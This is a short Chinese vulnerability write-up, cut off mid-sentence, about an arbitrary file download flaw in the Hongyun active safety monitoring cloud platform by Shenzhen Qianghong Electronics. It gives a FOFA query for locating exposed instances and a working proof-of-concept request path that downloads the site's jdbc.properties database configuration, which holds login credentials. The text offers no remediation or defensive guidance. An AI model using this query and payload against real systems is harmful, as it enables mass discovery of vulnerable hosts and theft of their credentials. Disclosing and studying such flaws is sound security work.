简介深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞，攻击者可通过此漏洞下载网站配置文件等获得登录账号密码漏洞复现FOFA语法：body="./open/webApi.html"获取网站数据库配置文件POC：/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties访问http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties可直接下载到该